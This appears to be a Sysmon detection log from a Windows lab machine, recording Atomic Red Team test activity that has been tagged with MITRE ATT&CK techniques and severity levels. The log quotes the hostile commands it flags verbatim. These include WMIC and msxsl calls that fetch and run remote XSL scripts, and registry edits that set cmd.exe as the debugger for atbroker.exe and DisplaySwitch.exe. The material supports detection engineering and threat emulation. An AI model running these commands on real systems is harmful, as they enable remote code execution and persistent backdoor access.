SHA1=4F4970C3545972FEA2BC1984D597FC810E6321E0,MD5=AE61D8F04BCDE8158304067913160B31,SHA256=25C8266D2BC1D5626DCDF72419838B397D28D44D00AC09F02FF4E421B43EC369,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 747F3D96-D8EA-5D31-0000-001030B63300 1988 C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "net view" ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563547882.333688,2019-07-19T18:51:22.333688+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "net view" ),1," 1 5 4 1 0 0x8000000000000000 3770 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:51:22.302 747F3D96-D8EA-5D31-0000-001030B63300 1988 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c "net view" C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1077] Windows Admin Shares - Process - Created,1563547882.314203,2019-07-19T18:51:22.314203+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\net.exe ) through command line ( net view /domain ),1," 1 5 4 1 0 0x8000000000000000 3769 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:51:09.839 747F3D96-D8DD-5D31-0000-001043953300 3012 C:\Windows\System32\net.exe 10.0.17763.1 (WinBuild.160101.0800) Net Command Microsoft® Windows® Operating System Microsoft Corporation net view /domain C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=4F4970C3545972FEA2BC1984D597FC810E6321E0,MD5=AE61D8F04BCDE8158304067913160B31,SHA256=25C8266D2BC1D5626DCDF72419838B397D28D44D00AC09F02FF4E421B43EC369,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 747F3D96-D8DD-5D31-0000-0010EF923300 4856 C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "net view /domain" ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1018] Remote System Discovery - Process,1563547882.314203,2019-07-19T18:51:22.314203+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\net.exe ) through command line ( net view /domain ),1," 1 5 4 1 0 0x8000000000000000 3769 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:51:09.839 747F3D96-D8DD-5D31-0000-001043953300 3012 C:\Windows\System32\net.exe 10.0.17763.1 (WinBuild.160101.0800) Net Command Microsoft® Windows® Operating System Microsoft Corporation net view /domain C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=4F4970C3545972FEA2BC1984D597FC810E6321E0,MD5=AE61D8F04BCDE8158304067913160B31,SHA256=25C8266D2BC1D5626DCDF72419838B397D28D44D00AC09F02FF4E421B43EC369,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 747F3D96-D8DD-5D31-0000-0010EF923300 4856 C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "net view /domain" ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563547869.845415,2019-07-19T18:51:09.845415+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "net view /domain" ),1," 1 5 4 1 0 0x8000000000000000 3768 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:51:09.804 747F3D96-D8DD-5D31-0000-0010EF923300 4856 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c "net view /domain" C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563547869.823311,2019-07-19T18:51:09.823311+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," 1 5 4 1 0 0x8000000000000000 3767 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:51:06.873 747F3D96-D8DA-5D31-0000-00100D8A3300 4016 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1047] Windows Management Instrumentation - Process,1563547866.88803,2019-07-19T18:51:06.888030+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\wbem\WMIC.exe ) through command line ( wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl ),1," 1 5 4 1 0 0x8000000000000000 3766 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:51:06.748 747F3D96-D8DA-5D31-0000-001029863300 3220 C:\Windows\System32\wbem\WMIC.exe 10.0.17763.1 (WinBuild.160101.0800) WMI Commandline Utility Microsoft® Windows® Operating System Microsoft Corporation wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=4004528344D02FD143DAFD94BFE056041B633E0D,MD5=390B2038C9ED2C94AB505921BC827FC7,SHA256=34C4ED50A3441BD7CB6411749771C637A8C18C791525D8FCB5AE71B0B1969BA6,IMPHASH=AF8CD6625FCE3244397EE550EFF4091E 747F3D96-D8DA-5D31-0000-0010D3833300 5340 C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl" ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563547866.75324,2019-07-19T18:51:06.753240+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl" ),1," 1 5 4 1 0 0x8000000000000000 3765 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:51:06.714 747F3D96-D8DA-5D31-0000-0010D3833300 5340 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c "wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl" C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1047] Windows Management Instrumentation - Process,1563547866.75324,2019-07-19T18:51:06.753240+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl" ),1," 1 5 4 1 0 0x8000000000000000 3765 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:51:06.714 747F3D96-D8DA-5D31-0000-0010D3833300 5340 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c "wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl" C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1603194656.569246,2020-10-20T15:50:56.569246+04:00,,Threat,Low,Found User (DESKTOP-NTSSLJD\den) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1," 1 5 4 1 0 0x8000000000000000 988 Microsoft-Windows-Sysmon/Operational DESKTOP-NTSSLJD technique_id=T1059.003,technique_name=Windows Command Shell 2020-10-20 11:50:56.472 23F38D93-CF20-5F8E-D008-000000000C00 9620 C:\Windows\System32\cmd.exe 10.0.18362.449 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation Cmd.Exe "C:\Windows\system32\cmd.exe" C:\Windows\system32\ DESKTOP-NTSSLJD\den 23F38D93-AE9B-5F8E-A2EC-170000000000 0x17eca2 2 High SHA1=8DCA9749CD48D286950E7A9FA1088C937CBCCAD4,MD5=D7AB69FAD18D4A643D84A271DFC0DBDF,SHA256=FF79D3C4A0B7EB191783C323AB8363EBD1FD10BE58D8BCC96B07067743CA81D5,IMPHASH=272245E2988E1E430500B852C4FB5E18 23F38D93-CF20-5F8E-CE08-000000000C00 6896 C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe ",DESKTOP-NTSSLJD,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563547866.728089,2019-07-19T18:51:06.728089+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," 1 5 4 1 0 0x8000000000000000 3764 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:50:56.162 747F3D96-D8D0-5D31-0000-001034673300 396 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1047] Windows Management Instrumentation - Process,1563547856.18299,2019-07-19T18:50:56.182990+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\wbem\WMIC.exe ) through command line ( wmic.exe process /FORMAT:list ),1," 1 5 4 1 0 0x8000000000000000 3763 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:50:56.021 747F3D96-D8D0-5D31-0000-0010F3623300 7040 C:\Windows\System32\wbem\WMIC.exe 10.0.17763.1 (WinBuild.160101.0800) WMI Commandline Utility Microsoft® Windows® Operating System Microsoft Corporation wmic.exe process /FORMAT:list C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=4004528344D02FD143DAFD94BFE056041B633E0D,MD5=390B2038C9ED2C94AB505921BC827FC7,SHA256=34C4ED50A3441BD7CB6411749771C637A8C18C791525D8FCB5AE71B0B1969BA6,IMPHASH=AF8CD6625FCE3244397EE550EFF4091E 747F3D96-D8CF-5D31-0000-00109B603300 5380 C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "wmic.exe process /FORMAT:list" ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563547856.04777,2019-07-19T18:50:56.047770+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "wmic.exe process /FORMAT:list" ),1," 1 5 4 1 0 0x8000000000000000 3762 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:50:55.978 747F3D96-D8CF-5D31-0000-00109B603300 5380 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c "wmic.exe process /FORMAT:list" C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1047] Windows Management Instrumentation - Process,1563547856.04777,2019-07-19T18:50:56.047770+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "wmic.exe process /FORMAT:list" ),1," 1 5 4 1 0 0x8000000000000000 3762 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:50:55.978 747F3D96-D8CF-5D31-0000-00109B603300 5380 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c "wmic.exe process /FORMAT:list" C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563547855.991996,2019-07-19T18:50:55.991996+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," 1 5 4 1 0 0x8000000000000000 3761 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:50:53.038 747F3D96-D8CD-5D31-0000-001047543300 1852 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563547853.062635,2019-07-19T18:50:53.062635+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "C:\Windows\Temp\msxsl.exe https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslxmlfile.xml https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslscript.xsl" ),1," 1 5 4 1 0 0x8000000000000000 3760 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:50:52.989 747F3D96-D8CC-5D31-0000-001038513300 948 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c "C:\Windows\Temp\msxsl.exe https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslxmlfile.xml https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslscript.xsl" C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563547853.011281,2019-07-19T18:50:53.011281+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," 1 5 4 1 0 0x8000000000000000 3759 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:50:50.067 747F3D96-D8CA-5D31-0000-0010CF443300 6268 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563547850.086593,2019-07-19T18:50:50.086593+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "C:\Windows\Temp\msxsl.exe C:\AtomicRedTeam\atomics\T1220\src\msxslxmlfile.xml C:\AtomicRedTeam\atomics\T1220\src\msxslscript.xsl" ),1," 1 5 4 1 0 0x8000000000000000 3758 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:50:50.029 747F3D96-D8CA-5D31-0000-0010DA413300 4004 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c "C:\Windows\Temp\msxsl.exe C:\AtomicRedTeam\atomics\T1220\src\msxslxmlfile.xml C:\AtomicRedTeam\atomics\T1220\src\msxslscript.xsl" C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational Prohibited Process connecting to internet,1563547850.046476,2019-07-19T18:50:50.046476+04:00,,Threat,Critical,"User (MSEDGEWIN10\IEUser) run process C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe and initiated network connection from hostname ( MSEDGEWIN10.home and IP ( 10.0.2.15 ) to hostname ( ams15s30-in-f4.1e100.net ) , IP ( 172.217.17.132 ) and port ( 80 )",3," 3 5 4 3 0 0x8000000000000000 3757 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 Suspicious NetCon 2019-07-19 14:50:20.871 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe MSEDGEWIN10\IEUser tcp true false 10.0.2.15 MSEDGEWIN10.home 49727 false 172.217.17.132 ams15s30-in-f4.1e100.net 80 http ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563547825.37603,2019-07-19T18:50:25.376030+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," 1 5 4 1 0 0x8000000000000000 3756 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:50:19.533 747F3D96-D8AB-5D31-0000-0010A4D53200 1888 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563547819.491237,2019-07-19T18:50:19.491237+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg add " HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution "Options\atbroker.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f" ),1," 1 5 4 1 0 0x8000000000000000 3753 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:50:19.455 747F3D96-D8AB-5D31-0000-001054D03200 6244 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c "reg add " HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution "Options\atbroker.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f" C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563547819.467476,2019-07-19T18:50:19.467476+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," 1 5 4 1 0 0x8000000000000000 3752 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:50:18.000 747F3D96-D8AA-5D31-0000-0010C0C93200 6016 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563547817.963904,2019-07-19T18:50:17.963904+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg add " HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution "Options\DisplaySwitch.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f" ),1," 1 5 4 1 0 0x8000000000000000 3749 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:50:17.916 747F3D96-D8A9-5D31-0000-001072C43200 6068 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c "reg add " HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution "Options\DisplaySwitch.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f" C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563547817.941637,2019-07-19T18:50:17.941637+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," 1 5 4 1 0 0x8000000000000000 3748 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:50:14.762 747F3D96-D8A6-5D31-0000-0010F9B13200 6664 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High 